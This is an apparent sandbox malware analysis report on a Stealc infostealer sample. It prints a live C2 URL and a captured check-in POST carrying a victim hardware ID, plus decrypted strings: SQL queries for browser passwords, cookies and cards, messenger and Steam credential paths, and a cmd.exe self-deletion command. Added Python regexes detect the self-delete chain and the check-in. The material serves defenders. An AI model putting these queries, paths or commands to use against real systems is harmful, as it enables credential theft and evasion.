Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546643
MD5: fbc1650a9c7f6f7c01aa9c1bd71cf2cb
SHA1: 02a2bbc7edf8712575e11ca3a5b2fb38255b6851
SHA256: 2222b91f09e31a309de68a2d7f66ef1ba8588d5fd0c92c6b15ca4d57622d509f
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1360 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FBC1650A9C7F6F7C01AA9C1BD71CF2CB)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Yara matches

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2018399242.0000000004C60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 1360 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 1360 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.190000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma: No Sigma rule has matched

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T10:56:57.782133+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.190000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.190000.0.unpack | String decryptor (one decrypted string per line):
    INSERT_KEY_HERE
    30
    11
    20
    24
    GetProcAddress
    LoadLibraryA
    lstrcatA
    OpenEventA
    CreateEventA
    CloseHandle
    Sleep
    GetUserDefaultLangID
    VirtualAllocExNuma
    VirtualFree
    GetSystemInfo
    VirtualAlloc
    HeapAlloc
    GetComputerNameA
    lstrcpyA
    GetProcessHeap
    GetCurrentProcess
    lstrlenA
    ExitProcess
    GlobalMemoryStatusEx
    GetSystemTime
    SystemTimeToFileTime
    advapi32.dll
    gdi32.dll
    user32.dll
    crypt32.dll
    ntdll.dll
    GetUserNameA
    CreateDCA
    GetDeviceCaps
    ReleaseDC
    CryptStringToBinaryA
    sscanf
    VMwareVMware
    HAL9TH
    JohnDoe
    DISPLAY
    %hu/%hu/%hu
    http://185.215.113.206
    bksvnsj
    /6c4adf523b719729.php
    /746f34465cf17784/
    tale
    GetEnvironmentVariableA
    GetFileAttributesA
    GlobalLock
    HeapFree
    GetFileSize
    GlobalSize
    CreateToolhelp32Snapshot
    IsWow64Process
    Process32Next
    GetLocalTime
    FreeLibrary
    GetTimeZoneInformation
    GetSystemPowerStatus
    GetVolumeInformationA
    GetWindowsDirectoryA
    Process32First
    GetLocaleInfoA
    GetUserDefaultLocaleName
    GetModuleFileNameA
    DeleteFileA
    FindNextFileA
    LocalFree
    FindClose
    SetEnvironmentVariableA
    LocalAlloc
    GetFileSizeEx
    ReadFile
    SetFilePointer
    WriteFile
    CreateFileA
    FindFirstFileA
    CopyFileA
    VirtualProtect
    GetLogicalProcessorInformationEx
    GetLastError
    lstrcpynA
    MultiByteToWideChar
    GlobalFree
    WideCharToMultiByte
    GlobalAlloc
    OpenProcess
    TerminateProcess
    GetCurrentProcessId
    gdiplus.dll
    ole32.dll
    bcrypt.dll
    wininet.dll
    shlwapi.dll
    shell32.dll
    psapi.dll
    rstrtmgr.dll
    CreateCompatibleBitmap
    SelectObject
    BitBlt
    DeleteObject
    CreateCompatibleDC
    GdipGetImageEncodersSize
    GdipGetImageEncoders
    GdipCreateBitmapFromHBITMAP
    GdiplusStartup
    GdiplusShutdown
    GdipSaveImageToStream
    GdipDisposeImage
    GdipFree
    GetHGlobalFromStream
    CreateStreamOnHGlobal
    CoUninitialize
    CoInitialize
    CoCreateInstance
    BCryptGenerateSymmetricKey
    BCryptCloseAlgorithmProvider
    BCryptDecrypt
    BCryptSetProperty
    BCryptDestroyKey
    BCryptOpenAlgorithmProvider
    GetWindowRect
    GetDesktopWindow
    GetDC
    CloseWindow
    wsprintfA
    EnumDisplayDevicesA
    GetKeyboardLayoutList
    CharToOemW
    wsprintfW
    RegQueryValueExA
    RegEnumKeyExA
    RegOpenKeyExA
    RegCloseKey
    RegEnumValueA
    CryptBinaryToStringA
    CryptUnprotectData
    SHGetFolderPathA
    ShellExecuteExA
    InternetOpenUrlA
    InternetConnectA
    InternetCloseHandle
    InternetOpenA
    HttpSendRequestA
    HttpOpenRequestA
    InternetReadFile
    InternetCrackUrlA
    StrCmpCA
    StrStrA
    StrCmpCW
    PathMatchSpecA
    GetModuleFileNameExA
    RmStartSession
    RmRegisterResources
    RmGetList
    RmEndSession
    sqlite3_open
    sqlite3_prepare_v2
    sqlite3_step
    sqlite3_column_text
    sqlite3_finalize
    sqlite3_close
    sqlite3_column_bytes
    sqlite3_column_blob
    encrypted_key
    PATH
    C:\ProgramData\nss3.dll
    NSS_Init
    NSS_Shutdown
    PK11_GetInternalKeySlot
    PK11_FreeSlot
    PK11_Authenticate
    PK11SDR_Decrypt
    C:\ProgramData\
    SELECT origin_url, username_value, password_value FROM logins
    browser:
    profile:
    url:
    login:
    password:
    Opera
    OperaGX
    Network
    cookies
    .txt
    SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
    TRUE
    FALSE
    autofill
    SELECT name, value FROM autofill
    history
    SELECT url FROM urls LIMIT 1000
    cc
    SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
    name:
    month:
    year:
    card:
    Cookies
    Login Data
    Web Data
    History
    logins.json
    formSubmitURL
    usernameField
    encryptedUsername
    encryptedPassword
    guid
    SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
    SELECT fieldname, value FROM moz_formhistory
    SELECT url FROM moz_places LIMIT 1000
    cookies.sqlite
    formhistory.sqlite
    places.sqlite
    plugins
    Local Extension Settings
    Sync Extension Settings
    IndexedDB
    Opera Stable
    Opera GX Stable
    CURRENT
    chrome-extension_
    _0.indexeddb.leveldb
    Local State
    profiles.ini
    chrome
    opera
    firefox
    wallets
    %08lX%04lX%lu
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName
    x32
    x64
    %d/%d/%d %d:%d:%d
    HARDWARE\DESCRIPTION\System\CentralProcessor\0
    ProcessorNameString
    SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    DisplayName
    DisplayVersion
    Network Info:
    - IP: IP?
    - Country: ISO?
    System Summary:
    - HWID:
    - OS:
    - Architecture:
    - UserName:
    - Computer Name:
    - Local Time:
    - UTC:
    - Language:
    - Keyboards:
    - Laptop:
    - Running Path:
    - CPU:
    - Threads:
    - Cores:
    - RAM:
    - Display Resolution:
    - GPU:
    User Agents:
    Installed Apps:
    All Users:
    Current User:
    Process List:
    system_info.txt
    freebl3.dll
    mozglue.dll
    msvcp140.dll
    nss3.dll
    softokn3.dll
    vcruntime140.dll
    \Temp\
    .exe
    runas
    open
    /c start
    %DESKTOP%
    %APPDATA%
    %LOCALAPPDATA%
    %USERPROFILE%
    %DOCUMENTS%
    %PROGRAMFILES%
    %PROGRAMFILES_86%
    %RECENT%
    *.lnk
    files
    \discord\
    \Local Storage\leveldb\CURRENT
    \Local Storage\leveldb
    \Telegram Desktop\
    key_datas
    D877F783D5D3EF8C*
    map*
    A7FDF864FBC10B77*
    A92DAA6EA6F891F2*
    F8806DD0C461824F*
    Telegram
    Tox
    *.tox
    *.ini
    Password
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
    00000001
    00000002
    00000003
    00000004
    \Outlook\accounts.txt
    Pidgin
    \.purple\
    accounts.xml
    dQw4w9WgXcQ
    token:
    Software\Valve\Steam
    SteamPath
    \config\
    ssfn*
    config.vdf
    DialogConfig.vdf
    DialogConfigOverlay*.vdf
    libraryfolders.vdf
    loginusers.vdf
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.190000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.190000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.190000.0.unpackString decryptor: done
                Source: 0.2.file.exe.190000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.190000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.190000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.190000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.190000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.190000.0.unpackString decryptor: https
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.190000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.190000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.190000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.190000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.190000.0.unpackString decryptor: build
                Source: 0.2.file.exe.190000.0.unpackString decryptor: token
                Source: 0.2.file.exe.190000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.190000.0.unpackString decryptor: file
                Source: 0.2.file.exe.190000.0.unpackString decryptor: message
                Source: 0.2.file.exe.190000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.190000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019A2B0 CryptUnprotectData,LocalAlloc,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001972A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
                Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU | source: file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb | source: file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00191710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001A4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0019DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
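Three of the decrypted strings above (`/c timeout /t 5 & del /f /q "`, `" & del "C:\ProgramData\*.dll"" & exit` and `C:\Windows\system32\cmd.exe`) are the fragments of a self-deletion command line: the stealer spawns cmd.exe, waits five seconds, deletes its own executable and then deletes any DLLs it dropped under C:\ProgramData. The following Python is an added detection example, not part of the Joe Sandbox report and not code from the sample; the process-creation records, their field names (parent_image, image, command_line) and the sample paths are constructed for illustration and do not come from this analysis.

```python
import re

# Constructed process-creation records (NOT from the sandbox run). Field names
# are an assumption; map them to whatever your EDR or Sysmon pipeline emits.
EVENTS = [
    {  # the chain implied by the decrypted strings: cmd.exe spawned by the stealer
        "parent_image": r"C:\Users\user\Desktop\file.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q '
                        r'"C:\Users\user\Desktop\file.exe" & del "C:\ProgramData\*.dll"" & exit',
    },
    {  # benign-looking cleanup: no timeout, no executable, no ProgramData sweep
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'cmd.exe /c del /f /q "C:\Users\user\Downloads\old.txt"',
    },
    {  # an updater removing a temp binary: timeout+del present, but not its own image
        "parent_image": r"C:\Program Files\Updater\updater.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "command_line": r'cmd.exe /c timeout /t 5 & del /f /q "C:\Program Files\Updater\tmp.exe"',
    },
]

# "timeout /t N & del /f /q "<something>.exe"" as seen in the decrypted strings.
SELF_DELETE = re.compile(
    r'timeout\s+/t\s+\d+\s*&\s*del\s+/f\s+/q\s+"(?P<target>[^"]+\.exe)"', re.IGNORECASE)
# The trailing sweep of dropped helper DLLs (the report also shows sqlite3.dll among the strings).
DROP_CLEANUP = re.compile(r'del\s+"C:\\ProgramData\\\*\.dll"', re.IGNORECASE)


def classify(event: dict) -> dict:
    """Evaluate one process-creation record against the three markers."""
    cmd = event["command_line"]
    m = SELF_DELETE.search(cmd)
    # Strongest signal: the file being deleted is the parent process's own image.
    deletes_parent = bool(m) and m.group("target").lower() == event["parent_image"].lower()
    return {
        "self_delete": bool(m),
        "deletes_parent": deletes_parent,
        "programdata_dll_cleanup": bool(DROP_CLEANUP.search(cmd)),
    }


def score(event: dict) -> int:
    """0..3; all three markers together reproduce the chain in this report."""
    return sum(classify(event).values())


def alerts(events, threshold: int = 2):
    """Parent images whose cmd.exe child scores at or above the threshold."""
    return [e["parent_image"] for e in events if score(e) >= threshold]


if __name__ == "__main__":
    for e in EVENTS:
        print(score(e), e["parent_image"])
    print("alerts:", alerts(EVENTS))
```

The threshold of two keeps the updater-style record (timeout plus del, but not of its own image) below alert level while still firing if a sample omits the ProgramData sweep; tune it against your own telemetry before deploying.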

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 30 31 38 41 37 39 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a
                    Data Ascii (one line per CRLF in the raw bytes):
                        ------IIEBGIDAAFHIJJJJEGCG
                        Content-Disposition: form-data; name="hwid"

                        F9C8018A799D1524750037
                        ------IIEBGIDAAFHIJJJJEGCG
                        Content-Disposition: form-data; name="build"

                        tale
                        ------IIEBGIDAAFHIJJJJEGCG--
                Source: Joe Sandbox View | IP Address: 185.215.113.206
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (7 connections; the C2 is addressed by raw IP, so no DNS lookup precedes them)
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001962D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    Host: 185.215.113.206
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: unknown | HTTP traffic detected:
                    POST /6c4adf523b719729.php HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG
                    Host: 185.215.113.206
                    Content-Length: 211
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 39 43 38 30 31 38 41 37 39 39 44 31 35 32 34 37 35 30 30 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 47 49 44 41 41 46 48 49 4a 4a 4a 4a 45 47 43 47 2d 2d 0d 0a
                    Data Ascii (one line per CRLF in the raw bytes):
                        ------IIEBGIDAAFHIJJJJEGCG
                        Content-Disposition: form-data; name="hwid"

                        F9C8018A799D1524750037
                        ------IIEBGIDAAFHIJJJJEGCG
                        Content-Disposition: form-data; name="build"

                        tale
                        ------IIEBGIDAAFHIJJJJEGCG--
                Source: file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2062308102.0000000000E0E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php&
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php;
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpk
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phps
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/I
                Source: file.exe, 00000000.00000002.2062308102.0000000000E70000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/l
                Source: file.exe, file.exe, 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2018399242.0000000004C8B000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
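The check-in POST captured above is a 211-byte multipart/form-data body carrying exactly two fields, hwid (a per-victim hardware identifier) and build (the campaign name, here "tale"), sent to a .php path made of 16 hex characters on a raw IP with no DNS lookup. The following Python is an added example, not part of the Joe Sandbox report and not the sample's own code: it parses such a request and derives the triage indicators a detection engineer would check. The request body is constructed from the Data Ascii shown in this report; the path pattern and the "letters A to J only" boundary observation are taken from this single capture and are assumptions about the family, not documented protocol facts.

```python
import re

# Constructed from the Data Ascii / Data Raw of the POST in this report (not a live capture).
REQUEST_LINE = "POST /6c4adf523b719729.php HTTP/1.1"
CONTENT_TYPE = "multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG"
BODY = (
    b"------IIEBGIDAAFHIJJJJEGCG\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n\r\n'
    b"F9C8018A799D1524750037\r\n"
    b"------IIEBGIDAAFHIJJJJEGCG\r\n"
    b'Content-Disposition: form-data; name="build"\r\n\r\n'
    b"tale\r\n"
    b"------IIEBGIDAAFHIJJJJEGCG--\r\n"
)


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Return {field_name: value_bytes} for a multipart/form-data body (RFC 7578 shape)."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    if not m:
        raise ValueError("no boundary in Content-Type")
    delim = b"--" + m.group(2).encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if part.startswith(b"\r\n"):        # CRLF that follows every delimiter line
            part = part[2:]
        head, _, value = part.partition(b"\r\n\r\n")
        if value.endswith(b"\r\n"):         # CRLF that precedes the next delimiter
            value = value[:-2]
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value
    return fields


def checkin_indicators(request_line: str, content_type: str, body: bytes) -> dict:
    """Indicators drawn from this capture; each is an assumption about the family,
    so keep them separate rather than collapsing them into one rule."""
    method, path, _ = request_line.split(" ", 2)
    fields = parse_multipart(content_type, body) if method == "POST" else {}
    boundary = re.search(r"boundary=-*([A-Za-z0-9]+)", content_type)
    return {
        "post_to_16hex_php": method == "POST" and bool(re.fullmatch(r"/[0-9a-f]{16}\.php", path)),
        "fields_hwid_build_only": set(fields) == {"hwid", "build"},
        # Observed here only: the boundary uses just the letters A..J.
        "boundary_letters_a_to_j": bool(boundary) and bool(re.fullmatch(r"[A-J]+", boundary.group(1))),
    }


def is_stealc_checkin(request_line: str, content_type: str, body: bytes) -> bool:
    """Alert on the two structural indicators; the boundary alphabet is corroboration only."""
    ind = checkin_indicators(request_line, content_type, body)
    return ind["post_to_16hex_php"] and ind["fields_hwid_build_only"]


if __name__ == "__main__":
    print(parse_multipart(CONTENT_TYPE, BODY))
    print(checkin_indicators(REQUEST_LINE, CONTENT_TYPE, BODY))
```

Because the body is reconstructed byte for byte from the report, its length comes out at 211, matching the Content-Length header above; that is a useful sanity check whenever you rebuild a sample from a hex dump. The hwid and build values are sample-specific and should not be used as signatures.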

                System Summary

                Source: file.exe | Static PE information: section name: (blank)
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name: (blank)
                Source: C:\Users\user\Desktop\file.exe | Code functions (potential crypto routines):
                    0_2_001D0098, 0_2_005EC092, 0_2_001C2138, 0_2_001EB198, 0_2_005951F2, 0_2_001FE258, 0_2_001D4288,
                    0_2_0021B308, 0_2_006923FE, 0_2_0020D39E, 0_2_005E546F, 0_2_004B340E, 0_2_001BE544, 0_2_001B4573,
